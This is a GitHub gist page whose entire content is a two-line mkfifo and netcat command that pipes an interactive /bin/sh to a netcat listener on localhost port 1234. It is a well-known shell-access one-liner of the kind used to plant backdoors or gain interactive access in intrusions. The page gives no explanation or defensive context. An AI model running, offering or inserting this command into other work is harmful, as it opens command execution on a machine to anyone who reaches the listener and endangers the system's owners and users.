Skip to content

Instantly share code, notes, and snippets.

@fgsahoward
Created June 11, 2018 17:33
Show Gist options
  • Save fgsahoward/baf89cbe7a5ea2df63d2baec14df5d9c to your computer and use it in GitHub Desktop.
Save fgsahoward/baf89cbe7a5ea2df63d2baec14df5d9c to your computer and use it in GitHub Desktop.
$ rm -f /tmp/f; mkfifo /tmp/f
$ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment